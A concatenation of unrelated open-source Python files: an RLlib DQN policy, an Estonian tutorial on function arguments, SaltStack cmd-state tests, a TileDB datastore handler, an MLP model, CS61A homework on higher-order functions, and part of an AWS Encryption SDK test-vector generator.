or config["exploration_config"]["type"] == "ParameterNoise")
policy.q_model = ModelCatalog.get_model_v2(
obs_space=obs_space,
action_space=action_space,
num_outputs=num_outputs,
model_config=config["model"],
framework="torch",
model_interface=DQNTorchModel,
name=Q_SCOPE,
q_hiddens=config["hiddens"],
dueling=config["dueling"],
num_atoms=config["num_atoms"],
use_noisy=config["noisy"],
v_min=config["v_min"],
v_max=config["v_max"],
sigma0=config["sigma0"],
# TODO(sven): Move option to add LayerNorm after each Dense
# generically into ModelCatalog.
add_layer_norm=add_layer_norm)
policy.q_func_vars = policy.q_model.variables()
policy.target_q_model = ModelCatalog.get_model_v2(
obs_space=obs_space,
action_space=action_space,
num_outputs=num_outputs,
model_config=config["model"],
framework="torch",
model_interface=DQNTorchModel,
name=Q_TARGET_SCOPE,
q_hiddens=config["hiddens"],
dueling=config["dueling"],
num_atoms=config["num_atoms"],
use_noisy=config["noisy"],
v_min=config["v_min"],
v_max=config["v_max"],
sigma0=config["sigma0"],
# TODO(sven): Move option to add LayerNorm after each Dense
# generically into ModelCatalog.
add_layer_norm=add_layer_norm)
policy.target_q_func_vars = policy.target_q_model.variables()
return policy.q_model, TorchCategorical
def get_distribution_inputs_and_class(
policy: Policy,
model: ModelV2,
obs_batch: TensorType,
*,
explore: bool = True,
is_training: bool = False,
**kwargs) -> Tuple[TensorType, type, List[TensorType]]:
q_vals = compute_q_values(policy, model, obs_batch, explore, is_training)
q_vals = q_vals[0] if isinstance(q_vals, tuple) else q_vals
policy.q_values = q_vals
return policy.q_values, TorchCategorical, [] # state-out
def build_q_losses(policy: Policy, model, _,
train_batch: SampleBatch) -> TensorType:
config = policy.config
# Q-network evaluation.
q_t, q_logits_t, q_probs_t = compute_q_values(
policy,
policy.q_model,
train_batch[SampleBatch.CUR_OBS],
explore=False,
is_training=True)
# Target Q-network evaluation.
q_tp1, q_logits_tp1, q_probs_tp1 = compute_q_values(
policy,
policy.target_q_model,
train_batch[SampleBatch.NEXT_OBS],
explore=False,
is_training=True)
# Q scores for actions which we know were selected in the given state.
one_hot_selection = F.one_hot(train_batch[SampleBatch.ACTIONS],
policy.action_space.n)
q_t_selected = torch.sum(
torch.where(q_t > FLOAT_MIN, q_t,
torch.tensor(0.0, device=policy.device)) *
one_hot_selection, 1)
q_logits_t_selected = torch.sum(
q_logits_t * torch.unsqueeze(one_hot_selection, -1), 1)
# compute estimate of best possible value starting from state at t + 1
if config["double_q"]:
q_tp1_using_online_net, q_logits_tp1_using_online_net, \
q_dist_tp1_using_online_net = compute_q_values(
policy,
policy.q_model,
train_batch[SampleBatch.NEXT_OBS],
explore=False,
is_training=True)
q_tp1_best_using_online_net = torch.argmax(q_tp1_using_online_net, 1)
q_tp1_best_one_hot_selection = F.one_hot(q_tp1_best_using_online_net,
policy.action_space.n)
q_tp1_best = torch.sum(
torch.where(q_tp1 > FLOAT_MIN, q_tp1,
torch.tensor(0.0, device=policy.device)) *
q_tp1_best_one_hot_selection, 1)
q_probs_tp1_best = torch.sum(
q_probs_tp1 * torch.unsqueeze(q_tp1_best_one_hot_selection, -1), 1)
else:
q_tp1_best_one_hot_selection = F.one_hot(
torch.argmax(q_tp1, 1), policy.action_space.n)
q_tp1_best = torch.sum(
torch.where(q_tp1 > FLOAT_MIN, q_tp1,
torch.tensor(0.0, device=policy.device)) *
q_tp1_best_one_hot_selection, 1)
q_probs_tp1_best = torch.sum(
q_probs_tp1 * torch.unsqueeze(q_tp1_best_one_hot_selection, -1), 1)
policy.q_loss = QLoss(
q_t_selected, q_logits_t_selected, q_tp1_best, q_probs_tp1_best,
train_batch[PRIO_WEIGHTS], train_batch[SampleBatch.REWARDS],
train_batch[SampleBatch.DONES].float(), config["gamma"],
config["n_step"], config["num_atoms"], config["v_min"],
config["v_max"])
return policy.q_loss.loss
def adam_optimizer(policy: Policy,
config: TrainerConfigDict) -> "torch.optim.Optimizer":
return torch.optim.Adam(
policy.q_func_vars, lr=policy.cur_lr, eps=config["adam_epsilon"])
def build_q_stats(policy: Policy, batch) -> Dict[str, TensorType]:
return dict({
"cur_lr": policy.cur_lr,
}, **policy.q_loss.stats)
def setup_early_mixins(policy: Policy, obs_space, action_space,
config: TrainerConfigDict) -> None:
LearningRateSchedule.__init__(policy, config["lr"], config["lr_schedule"])
def after_init(policy: Policy, obs_space: gym.Space, action_space: gym.Space,
config: TrainerConfigDict) -> None:
ComputeTDErrorMixin.__init__(policy)
TargetNetworkMixin.__init__(policy, obs_space, action_space, config)
# Move target net to device (this is done autoatically for the
# policy.model, but not for any other models the policy has).
policy.target_q_model = policy.target_q_model.to(policy.device)
def compute_q_values(policy: Policy,
model: ModelV2,
obs: TensorType,
explore,
is_training: bool = False):
config = policy.config
model_out, state = model({
SampleBatch.CUR_OBS: obs,
"is_training": is_training,
}, [], None)
if config["num_atoms"] > 1:
(action_scores, z, support_logits_per_action, logits,
probs_or_logits) = model.get_q_value_distributions(model_out)
else:
(action_scores, logits,
probs_or_logits) = model.get_q_value_distributions(model_out)
if config["dueling"]:
state_score = model.get_state_value(model_out)
if policy.config["num_atoms"] > 1:
support_logits_per_action_mean = torch.mean(
support_logits_per_action, dim=1)
support_logits_per_action_centered = (
support_logits_per_action - torch.unsqueeze(
support_logits_per_action_mean, dim=1))
support_logits_per_action = torch.unsqueeze(
state_score, dim=1) + support_logits_per_action_centered
support_prob_per_action = nn.functional.softmax(
support_logits_per_action)
value = torch.sum(z * support_prob_per_action, dim=-1)
logits = support_logits_per_action
probs_or_logits = support_prob_per_action
else:
advantages_mean = reduce_mean_ignore_inf(action_scores, 1)
advantages_centered = action_scores - torch.unsqueeze(
advantages_mean, 1)
value = state_score + advantages_centered
else:
value = action_scores
return value, logits, probs_or_logits
def grad_process_and_td_error_fn(policy: Policy,
optimizer: "torch.optim.Optimizer",
loss: TensorType) -> Dict[str, TensorType]:
# Clip grads if configured.
return apply_grad_clipping(policy, optimizer, loss)
def extra_action_out_fn(policy: Policy, input_dict, state_batches, model,
action_dist) -> Dict[str, TensorType]:
return {"q_values": policy.q_values}
DQNTorchPolicy = build_torch_policy(
name="DQNTorchPolicy",
loss_fn=build_q_losses,
get_default_config=lambda: ray.rllib.agents.dqn.dqn.DEFAULT_CONFIG,
make_model_and_action_dist=build_q_model_and_distribution,
action_distribution_fn=get_distribution_inputs_and_class,
stats_fn=build_q_stats,
postprocess_fn=postprocess_nstep_and_prio,
optimizer_fn=adam_optimizer,
extra_grad_process_fn=grad_process_and_td_error_fn,
extra_learn_fetches_fn=lambda policy: {"td_error": policy.q_loss.td_error},
extra_action_out_fn=extra_action_out_fn,
before_init=setup_early_mixins,
after_init=after_init,
mixins=[
TargetNetworkMixin,
ComputeTDErrorMixin,
LearningRateSchedule,
])
| 1.921875 | 2 |
formfyxer/__init__.py | SuffolkLITLab/FormFyxer | 1 | 1245 | from .lit_explorer import *
from .pdf_wrangling import *
| 1.007813 | 1 |
Overview/11 - funktsioonid.py | priidupaomets/python_kursus | 1 | 1246 | <reponame>priidupaomets/python_kursus<gh_stars>1-10
"""
funktsioonid.py
Funktsioonide ja protseduuride kasutamine
"""
#
# Protseduur
#
def minu_funktsioon():
print("See on protseduur")
# Kutsume funktsiooni välja
minu_funktsioon()
#
# Funktsioon
#
def liida(num1, num2):
return num1 + num2
sum = liida(3, 5)
print(sum)
# Näide vaikeväärtuste kasutamisest
# def funk(arg1 = väärtus1, arg2 = väärtus2)
# pass
def funk(arg1 = 0, arg2 = "Test"):
print(arg1, arg2)
funk() # Kutsume funktsiooni välja ilma argumente kaasa andmata
#
# Algarvude leidmine
#
def isprime(n):
if n <= 1:
return False
for i in range(2, n):
if n % i == 0:
return False
else:
return True
# Kustume funktsiooni testimiseks välja
n = 5
if isprime(n):
print(f"{n} ON algarv") # Kasutame f-formaatimisstringi, mis lubab muutuja otse stringi sisse panna
else:
print(f"{n} EI OLE algarv")
def list_primes(max_num = 100):
for n in range(2, max_num):
if isprime(n):
print(n, end = ' ', flush = True)
print()
list_primes()
#
# Muutuva arvu argumentidega funktsioonid
#
# Lisame lihtsalt uusi argumente
def summa(num1, num2, num3):
return num1 + num2 + num3
print(summa(1, 2, 3)) # Töötab
print(summa(1, 2)) # Saame vea, kuna uus funktsioon nõuab 3 argumenti
# Katsetame funktsiooni ülelaadimist (function overloading või method overloading)
def summa(num1, num2):
return num1 + num2
def summa(num1, num2, num3):
return num1 + num2 + num3
print(summa(1, 2)) # Saame vea, kuna viimane def kirjutab eelmise üle
print(summa(1, 2, 3))
# Katsetame vaikeväärtustega funktsioone
def summa(num1, num2, num3 = 0, num4 = 0):
return num1 + num2 + num3 + num4
print(summa(1, 2))
print(summa(1, 2, 3))
print(summa(1, 2, 3, 4))
#print(summa(1, 2, 3, 4, 5)) # Selle tööle saamiseks peame f-ni muutma
def keskmine(num1, num2, num3 = 0, num4 = 0):
sum = num1 + num2 + num3 + num4 # Sama, mis summa(num1, num2, num3, num4)
argumente = 4.0
return sum / argumente
print(keskmine(1, 2)) # Ilmselgelt vale tulemus (1.5 asemel 0.75)
print(keskmine(1, 2, 3)) # Ka vale tulemus (2 asemel 1.5)
print(keskmine(1, 2, 3, 4)) # Õige tulemus
# Täiendame argumentide arvu leidmist
def keskmine(num1, num2, num3 = 0, num4 = 0):
sum = num1 + num2 + num3 + num4 # Sama, mis summa(num1, num2, num3, num4)
argumente = 2.0 # Minimaalselt 2
if num3 > 0:
argumente = argumente + 1
if num4 > 0:
argumente = argumente + 1
return sum / argumente
print(keskmine(1, 2)) # Õige tulemus
print(keskmine(1, 2, 3)) # Õige tulemus
print(keskmine(1, 2, 3, 4)) # Õige tulemus
print(keskmine(1, 2, 3, 0)) # Vale tulemus!
print(keskmine(1, 0, 3, 2)) # Õige tulemus!?! Kuidas see nüüd õige on - kas tulemus sõltub argumentide järjekorrast?
# Kasutame teistsugust vaikeväärtust
def keskmine(num1, num2, num3 = None, num4 = None):
sum = num1 + num2 # Ei saa kohe 4 arg'i kokku liita
argumente = 2.0 # Minimaalselt 2
if num3 is not None:
argumente += 1
sum = sum + num3
if num4 is not None:
argumente += 1
sum = sum + num4
return sum / argumente
print(keskmine(1, 2)) # Õige tulemus
print(keskmine(1, 2, 3)) # Õige tulemus
print(keskmine(1, 2, 3, 4)) # Õige tulemus
print(keskmine(1, 2, 3, 0)) # Õige tulemus!
print(keskmine(1, 0, 3, 2)) # Õige tulemus
# Proovime listiga argumente defineerida
def summa(numbrid=[]):
sum = 0
for num in numbrid:
sum += num
return sum
#print(summa(1)) # Ei tööta, kuna pole itereeritav tüüp
#print(summa(1, 2)) # Ei tööta, kuna pole massiiv
arvud=[1, 2]
print(summa(arvud))
arvud=[1, 2, 3]
print(summa(arvud))
arvud=[1, 2, 3, 4]
print(summa(arvud))
print(summa([1, 2, 3, 4, 5])) # Võime panna ka ilma vahemuutujata
arvud=[1]
print(summa(arvud))
def summa(*numbrid):
sum = 0
for num in numbrid:
sum += num
return sum
print(summa()) # Isegi see variant töötab
print(summa(1))
print(summa(1, 2))
arvud=[1, 2]
print(summa(*arvud)) # Ka siin tuleb '*' kasutada
arvud=[1, 2, 3]
print(summa(*arvud))
arvud=[1, 2, 3, 4]
print(summa(*arvud))
arvud=[1, 2, 3, 4, 5]
print(summa(*arvud))
arvud=[1]
print(summa(*arvud))
# Erinevat sort argumendid
def argfun(arg1, arg2, *args, kw1 = 1, kw2 = "True"):
print(arg1, arg2, *args, kw1, kw2)
argfun(1, 2, 3, 4, 5, kw1 = 10, kw2 = 12)
def argfun(**kwargs):
for (arg, val) in kwargs.items():
print(f"{arg}={val}", end = ' ')
print()
argfun(kw2 = 10, kw3 = 12, kw4 = 14)
def argfun(arg1, arg2, *args, **kwargs):
print(arg1, arg2, *args)
for (arg, val) in kwargs.items():
print(f"{arg}={val}", end = ' ')
print()
argfun(1, 2, 3, 4, 5, kw2 = 10, kw3 = 12, kw4 = 14)
def argfun(arg1, arg2, *args, kw1 = 1, kw2 = "True", **kwargs):
print(arg1, arg2, *args, kw1, kw2)
for (arg, val) in kwargs.items():
print(f"{arg}={val}", end = ' ')
print()
argfun(1, 2, 3, 4, 5, kw2 = 10, kw3 = 12, kw4 = 14)
# Kuidas garanteerida, et argumentideks on numbrid?
def numsum(*numbrid):
sum = 0
for num in numbrid:
if isinstance(num, int) or isinstance(num, float):
sum += num
return sum
def numcount(*numbrid):
count = 0
for num in numbrid:
if isinstance(num, int) or isinstance(num, float):
count += 1
return count
def numavg(*numbrid):
sum = numsum(*numbrid)
count = numcount(*numbrid)
return sum / (count * 1.0) # Võime jagatava teha float tüübiks
print(numsum(1))
print(numsum(1, 2))
print(numsum(1, 2, 3))
print(numsum(1, 2, 3, "4"))
print(numsum(1, None, 3, 4, 5))
print("-"*30)
print(numcount(1))
print(numcount(1, 2))
print(numcount(1, 2, 3))
print(numcount(1, 2, 3, "4"))
print(numcount(1, None, 3, 4, 5))
print("-"*30)
print(numavg(1))
print(numavg(1, 2))
print(numavg(1, 2, 3))
print(numavg(1, 2, 3, "4"))
print(numavg(1, None, 3, 4, 5))
print(numavg()) # Viga! Nulliga jagamine!!!
# Vigade haldamist vaatame peatselt ka lähemalt
| 3.25 | 3 |
tests/integration/states/test_cmd.py | l2ol33rt/salt | 0 | 1247 | # -*- coding: utf-8 -*-
'''
Tests for the file state
'''
# Import python libs
from __future__ import absolute_import
import errno
import os
import textwrap
import tempfile
# Import Salt Testing libs
from tests.support.case import ModuleCase
from tests.support.paths import TMP_STATE_TREE
from tests.support.mixins import SaltReturnAssertsMixin
# Import salt libs
import salt.utils
IS_WINDOWS = salt.utils.is_windows()
class CMDTest(ModuleCase, SaltReturnAssertsMixin):
'''
Validate the cmd state
'''
def test_run_simple(self):
'''
cmd.run
'''
cmd = 'dir' if IS_WINDOWS else 'ls'
ret = self.run_state('cmd.run', name=cmd, cwd=tempfile.gettempdir())
self.assertSaltTrueReturn(ret)
def test_test_run_simple(self):
'''
cmd.run test interface
'''
ret = self.run_state('cmd.run', name='ls',
cwd=tempfile.gettempdir(), test=True)
self.assertSaltNoneReturn(ret)
class CMDRunRedirectTest(ModuleCase, SaltReturnAssertsMixin):
'''
Validate the cmd state of run_redirect
'''
def setUp(self):
self.state_name = 'run_redirect'
state_filename = self.state_name + '.sls'
self.state_file = os.path.join(TMP_STATE_TREE, state_filename)
# Create the testfile and release the handle
fd, self.test_file = tempfile.mkstemp()
try:
os.close(fd)
except OSError as exc:
if exc.errno != errno.EBADF:
raise exc
# Create the testfile and release the handle
fd, self.test_tmp_path = tempfile.mkstemp()
try:
os.close(fd)
except OSError as exc:
if exc.errno != errno.EBADF:
raise exc
super(CMDRunRedirectTest, self).setUp()
def tearDown(self):
for path in (self.state_file, self.test_tmp_path, self.test_file):
try:
os.remove(path)
except OSError:
# Not all of the tests leave files around that we want to remove
# As some of the tests create the sls files in the test itself,
# And some are using files in the integration test file state tree.
pass
super(CMDRunRedirectTest, self).tearDown()
def test_run_unless(self):
'''
test cmd.run unless
'''
state_key = 'cmd_|-{0}_|-{0}_|-run'.format(self.test_tmp_path)
with salt.utils.fopen(self.state_file, 'w') as fb_:
fb_.write(textwrap.dedent('''
{0}:
cmd.run:
- unless: echo cheese > {1}
'''.format(self.test_tmp_path, self.test_file)))
ret = self.run_function('state.sls', [self.state_name])
self.assertTrue(ret[state_key]['result'])
def test_run_unless_multiple_cmds(self):
'''
test cmd.run using multiple unless options where the first cmd in the
list will pass, but the second will fail. This tests the fix for issue
#35384. (The fix is in PR #35545.)
'''
sls = self.run_function('state.sls', mods='issue-35384')
self.assertSaltTrueReturn(sls)
# We must assert against the comment here to make sure the comment reads that the
# command "echo "hello"" was run. This ensures that we made it to the last unless
# command in the state. If the comment reads "unless execution succeeded", or similar,
# then the unless state run bailed out after the first unless command succeeded,
# which is the bug we're regression testing for.
self.assertEqual(sls['cmd_|-cmd_run_unless_multiple_|-echo "hello"_|-run']['comment'],
'Command "echo "hello"" run')
def test_run_creates_exists(self):
'''
test cmd.run creates already there
'''
state_key = 'cmd_|-echo >> {0}_|-echo >> {0}_|-run'.format(self.test_file)
with salt.utils.fopen(self.state_file, 'w') as fb_:
fb_.write(textwrap.dedent('''
echo >> {0}:
cmd.run:
- creates: {0}
'''.format(self.test_file)))
ret = self.run_function('state.sls', [self.state_name])
self.assertTrue(ret[state_key]['result'])
self.assertEqual(len(ret[state_key]['changes']), 0)
def test_run_creates_new(self):
'''
test cmd.run creates not there
'''
os.remove(self.test_file)
state_key = 'cmd_|-echo >> {0}_|-echo >> {0}_|-run'.format(self.test_file)
with salt.utils.fopen(self.state_file, 'w') as fb_:
fb_.write(textwrap.dedent('''
echo >> {0}:
cmd.run:
- creates: {0}
'''.format(self.test_file)))
ret = self.run_function('state.sls', [self.state_name])
self.assertTrue(ret[state_key]['result'])
self.assertEqual(len(ret[state_key]['changes']), 4)
def test_run_redirect(self):
'''
test cmd.run with shell redirect
'''
state_key = 'cmd_|-echo test > {0}_|-echo test > {0}_|-run'.format(self.test_file)
with salt.utils.fopen(self.state_file, 'w') as fb_:
fb_.write(textwrap.dedent('''
echo test > {0}:
cmd.run
'''.format(self.test_file)))
ret = self.run_function('state.sls', [self.state_name])
self.assertTrue(ret[state_key]['result'])
class CMDRunWatchTest(ModuleCase, SaltReturnAssertsMixin):
'''
Validate the cmd state of run_watch
'''
def setUp(self):
self.state_name = 'run_watch'
state_filename = self.state_name + '.sls'
self.state_file = os.path.join(TMP_STATE_TREE, state_filename)
super(CMDRunWatchTest, self).setUp()
def tearDown(self):
os.remove(self.state_file)
super(CMDRunWatchTest, self).tearDown()
def test_run_watch(self):
'''
test cmd.run watch
'''
saltines_key = 'cmd_|-saltines_|-echo changed=true_|-run'
biscuits_key = 'cmd_|-biscuits_|-echo biscuits_|-wait'
with salt.utils.fopen(self.state_file, 'w') as fb_:
fb_.write(textwrap.dedent('''
saltines:
cmd.run:
- name: echo changed=true
- cwd: /
- stateful: True
biscuits:
cmd.wait:
- name: echo biscuits
- cwd: /
- watch:
- cmd: saltines
'''))
ret = self.run_function('state.sls', [self.state_name])
self.assertTrue(ret[saltines_key]['result'])
self.assertTrue(ret[biscuits_key]['result'])
| 2.15625 | 2 |
mars/tensor/execution/datastore.py | ChenQuan/mars | 0 | 1248 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 1999-2018 Alibaba Group Holding Ltd.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
try:
import tiledb
except ImportError: # pragma: no cover
tiledb = None
from ...lib.sparse import SparseNDArray
from ...lib.sparse.core import sps
from ..expressions import datastore
from .utils import get_tiledb_ctx
def _store_tiledb(ctx, chunk):
tiledb_ctx = get_tiledb_ctx(chunk.op.tiledb_config)
uri = chunk.op.tiledb_uri
key = chunk.op.tiledb_key
timestamp = chunk.op.tiledb_timestamp
axis_offsets = chunk.op.axis_offsets
if not chunk.issparse():
# dense
to_store = np.ascontiguousarray(ctx[chunk.op.input.key])
slcs = []
for axis in range(chunk.ndim):
axis_offset = axis_offsets[axis]
axis_length = chunk.op.input.shape[axis]
slcs.append(slice(axis_offset, axis_offset + axis_length))
with tiledb.DenseArray(tiledb_ctx, uri, mode='w',
key=key, timestamp=timestamp) as arr:
arr[tuple(slcs)] = to_store
ctx[chunk.key] = np.empty((0,) * chunk.ndim, dtype=chunk.dtype)
else:
# sparse
to_store = ctx[chunk.op.input.key].spmatrix.tocoo()
if to_store.nnz > 0:
with tiledb.SparseArray(tiledb_ctx, uri, mode='w',
key=key, timestamp=timestamp) as arr:
if chunk.ndim == 1:
vec = to_store.col if to_store.shape[0] == 1 else to_store.row
vec += axis_offsets[0]
arr[vec] = to_store.data
else:
i, j = to_store.row + axis_offsets[0], to_store.col + axis_offsets[1]
arr[i, j] = to_store.data
ctx[chunk.key] = SparseNDArray(sps.csr_matrix((0, 0), dtype=chunk.dtype),
shape=chunk.shape)
def register_data_store_handler():
from ...executor import register
register(datastore.TensorTileDBDataStore, _store_tiledb)
| 1.726563 | 2 |
fastgc/model/mlp.py | ppmlguy/fastgradclip | 2 | 1249 | <gh_stars>1-10
import torch
import torch.nn as nn
import torch.nn.functional as F
from fastgc.model.penet import PeGradNet
from fastgc.layers.linear import Linear
from fastgc.activation import activation
class MLP(PeGradNet):
def __init__(self, input_size, hidden_sizes, output_size, act_func='sigmoid',
train_alg='batch'):
"""
Parameters:
------------------
- input_size: integer, the number of features in the input
- hidden_sizes: a list of integers, a list object containing number of units for hidden layers
- output_size: an integer, the length of output vector
- act_func: string, name of activation function to use for each hidden layer
- train_alg: string, allowed values are {'batch', 'reweight', 'naive'}
"""
super(MLP, self).__init__()
self.input_size = input_size
layer_sizes = [input_size] + hidden_sizes
self.linears = nn.ModuleList([Linear(in_size, out_size, bias=True)
for in_size, out_size in zip(layer_sizes[:-1],
layer_sizes[1:])])
self.output_layer = Linear(hidden_sizes[-1], output_size, bias=True)
self.act = activation[act_func]
self.train_alg=train_alg
# list of layers in the network
self.layers = [layer for layer in self.linears]
self.layers.append(self.output_layer)
def forward(self, x):
x = x.view(-1, self.input_size)
out = x
for layer in self.linears:
out = self.act(layer(out))
logits = self.output_layer(out)
return logits
| 2.90625 | 3 |
05-Environments/hw02/hw02/hw02.py | ericchen12377/CS61A_LearningDoc | 2 | 1250 | """ Homework 2: Higher Order Functions"""
HW_SOURCE_FILE = 'hw02.py'
from operator import add, mul, sub
square = lambda x: x * x
identity = lambda x: x
triple = lambda x: 3 * x
increment = lambda x: x + 1
######################
# Required Questions #
######################
def product(n, f):
"""Return the product of the first n terms in a sequence.
n -- a positive integer
f -- a function that takes one argument to produce the term
>>> product(3, identity) # 1 * 2 * 3
6
>>> product(5, identity) # 1 * 2 * 3 * 4 * 5
120
>>> product(3, square) # 1^2 * 2^2 * 3^2
36
>>> product(5, square) # 1^2 * 2^2 * 3^2 * 4^2 * 5^2
14400
>>> product(3, increment) # (1+1) * (2+1) * (3+1)
24
>>> product(3, triple) # 1*3 * 2*3 * 3*3
162
"""
"*** YOUR CODE HERE ***"
result,k = 1,1
while k <= n:
result,k = f(k)*result, k + 1
return result
def accumulate(combiner, base, n, f):
"""Return the result of combining the first n terms in a sequence and base.
The terms to be combined are f(1), f(2), ..., f(n). combiner is a
two-argument commutative, associative function.
>>> accumulate(add, 0, 5, identity) # 0 + 1 + 2 + 3 + 4 + 5
15
>>> accumulate(add, 11, 5, identity) # 11 + 1 + 2 + 3 + 4 + 5
26
>>> accumulate(add, 11, 0, identity) # 11
11
>>> accumulate(add, 11, 3, square) # 11 + 1^2 + 2^2 + 3^2
25
>>> accumulate(mul, 2, 3, square) # 2 * 1^2 * 2^2 * 3^2
72
>>> accumulate(lambda x, y: x + y + 1, 2, 3, square)
19
>>> accumulate(lambda x, y: 2 * (x + y), 2, 3, square)
58
>>> accumulate(lambda x, y: (x + y) % 17, 19, 20, square)
16
"""
"*** YOUR CODE HERE ***"
result, k = base,1
while k <= n:
result, k = combiner(result,f(k)), k + 1
return result
def summation_using_accumulate(n, f):
"""Returns the sum of f(1) + ... + f(n). The implementation
uses accumulate.
>>> summation_using_accumulate(5, square)
55
>>> summation_using_accumulate(5, triple)
45
>>> from construct_check import check
>>> # ban iteration and recursion
>>> check(HW_SOURCE_FILE, 'summation_using_accumulate',
... ['Recursion', 'For', 'While'])
True
"""
"*** YOUR CODE HERE ***"
# result, k = 0, 1
# while k <= n:
# result, k = result + f(k), k + 1
return accumulate(add,0,n,f)
def product_using_accumulate(n, f):
"""An implementation of product using accumulate.
>>> product_using_accumulate(4, square)
576
>>> product_using_accumulate(6, triple)
524880
>>> from construct_check import check
>>> # ban iteration and recursion
>>> check(HW_SOURCE_FILE, 'product_using_accumulate',
... ['Recursion', 'For', 'While'])
True
"""
"*** YOUR CODE HERE ***"
# result, k = 1, 1
# while k <= n:
# result, k = result * f(k), k + 1
return accumulate(mul,1,n,f)
def compose1(h, g):
"""Return a function f, such that f(x) = h(g(x))."""
def f(x):
return h(g(x))
return f
def make_repeater(h, n):
"""Return the function that computes the nth application of h.
>>> add_three = make_repeater(increment, 3)
>>> add_three(5)
8
>>> make_repeater(triple, 5)(1) # 3 * 3 * 3 * 3 * 3 * 1
243
>>> make_repeater(square, 2)(5) # square(square(5))
625
>>> make_repeater(square, 4)(5) # square(square(square(square(5))))
152587890625
>>> make_repeater(square, 0)(5) # Yes, it makes sense to apply the function zero times!
5
"""
"*** YOUR CODE HERE ***"
def repeater(x):
result, k = x,1
while k <= n:
result,k = h(result), k + 1
return result
return repeater
##########################
# Just for fun Questions #
##########################
def zero(f):
return lambda x: x
def successor(n):
return lambda f: lambda x: f(n(f)(x))
def one(f):
"""Church numeral 1: same as successor(zero)"""
"*** YOUR CODE HERE ***"
return lambda x: f(x)
def two(f):
"""Church numeral 2: same as successor(successor(zero))"""
"*** YOUR CODE HERE ***"
return lambda x: f(f(x))
three = successor(two)
def church_to_int(n):
"""Convert the Church numeral n to a Python integer.
>>> church_to_int(zero)
0
>>> church_to_int(one)
1
>>> church_to_int(two)
2
>>> church_to_int(three)
3
"""
"*** YOUR CODE HERE ***"
return n(lambda x: x + 1)(0)
def add_church(m, n):
"""Return the Church numeral for m + n, for Church numerals m and n.
>>> church_to_int(add_church(two, three))
5
"""
"*** YOUR CODE HERE ***"
return lambda f: lambda x: m(f)(n(f)(x))
def mul_church(m, n):
"""Return the Church numeral for m * n, for Church numerals m and n.
>>> four = successor(three)
>>> church_to_int(mul_church(two, three))
6
>>> church_to_int(mul_church(three, four))
12
"""
"*** YOUR CODE HERE ***"
return lambda f: m(n(f))
def pow_church(m, n):
"""Return the Church numeral m ** n, for Church numerals m and n.
>>> church_to_int(pow_church(two, three))
8
>>> church_to_int(pow_church(three, two))
9
"""
"*** YOUR CODE HERE ***"
return n(m)
| 4.5625 | 5 |
test_vector_handlers/src/awses_test_vectors/manifests/full_message/decrypt_generation.py | farleyb-amazon/aws-encryption-sdk-python | 95 | 1251 | # Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
"""
AWS Encryption SDK Decrypt Message Generation manifest handler.
Described in AWS Crypto Tools Test Vector Framework feature #0006 AWS Encryption SDK Decrypt Message Generation.
"""
import json
import os
import uuid
from copy import copy
import attr
import six
from aws_encryption_sdk.caches.local import LocalCryptoMaterialsCache
from aws_encryption_sdk.materials_managers.base import CryptoMaterialsManager
from aws_encryption_sdk.materials_managers.caching import CachingCryptoMaterialsManager
from aws_encryption_sdk.materials_managers.default import DefaultCryptoMaterialsManager
from awses_test_vectors.internal.defaults import ENCODING
from awses_test_vectors.internal.util import (
dictionary_validator,
file_reader,
file_writer,
iterable_validator,
membership_validator,
validate_manifest_type,
)
from awses_test_vectors.manifests.full_message.decrypt import (
DecryptionMethod,
MessageDecryptionManifest,
MessageDecryptionTestResult,
MessageDecryptionTestScenario,
)
from awses_test_vectors.manifests.full_message.encrypt import MessageEncryptionTestScenario
from awses_test_vectors.manifests.keys import KeysManifest
try:
from aws_encryption_sdk.identifiers import AlgorithmSuite
except ImportError:
from aws_encryption_sdk.identifiers import Algorithm as AlgorithmSuite
from awses_test_vectors.manifests.master_key import MasterKeySpec, master_key_provider_from_master_key_specs
try: # Python 3.5.0 and 3.5.1 have incompatible typing modules
from typing import IO, Callable, Dict, Iterable, Optional # noqa pylint: disable=unused-import
from awses_test_vectors.internal.mypy_types import ( # noqa pylint: disable=unused-import
ENCRYPT_SCENARIO_SPEC,
PLAINTEXTS_SPEC,
)
except ImportError: # pragma: no cover
# We only actually need these imports when running the mypy checks
pass
SUPPORTED_VERSIONS = (2,)
class TamperingMethod:
"""Base class for all tampering methods."""
@classmethod
def from_tampering_spec(cls, spec):
"""Load from a tampering specification"""
if spec is None:
return TamperingMethod()
if spec == "truncate":
return TruncateTamperingMethod()
if spec == "mutate":
return MutateTamperingMethod()
if spec == "half-sign":
return HalfSigningTamperingMethod()
((tampering_tag, tampering_values_spec),) = spec.items()
if tampering_tag == "change-edk-provider-info":
return ChangeEDKProviderInfoTamperingMethod.from_values_spec(tampering_values_spec)
raise ValueError("Unrecognized tampering method tag: " + tampering_tag)
# pylint: disable=R0201
def run_scenario_with_tampering(self, ciphertext_writer, generation_scenario, plaintext_uri):
"""
Run a given scenario, tampering with the input or the result.
return: a list of (ciphertext, result) pairs
"""
materials_manager = DefaultCryptoMaterialsManager(
generation_scenario.encryption_scenario.master_key_provider_fn()
)
ciphertext_to_decrypt = generation_scenario.encryption_scenario.run(materials_manager)
if generation_scenario.result:
expected_result = generation_scenario.result
else:
expected_result = MessageDecryptionTestResult.expect_output(
plaintext_uri=plaintext_uri, plaintext=generation_scenario.encryption_scenario.plaintext
)
return [
generation_scenario.decryption_test_scenario_pair(ciphertext_writer, ciphertext_to_decrypt, expected_result)
]
class ChangeEDKProviderInfoTamperingMethod(TamperingMethod):
"""Tampering method that changes the provider info on all EDKs."""
new_provider_infos = attr.ib(validator=iterable_validator(list, six.string_types))
def __init__(self, new_provider_infos):
"""Create a new instance for a given new provider info value."""
self.new_provider_infos = new_provider_infos
@classmethod
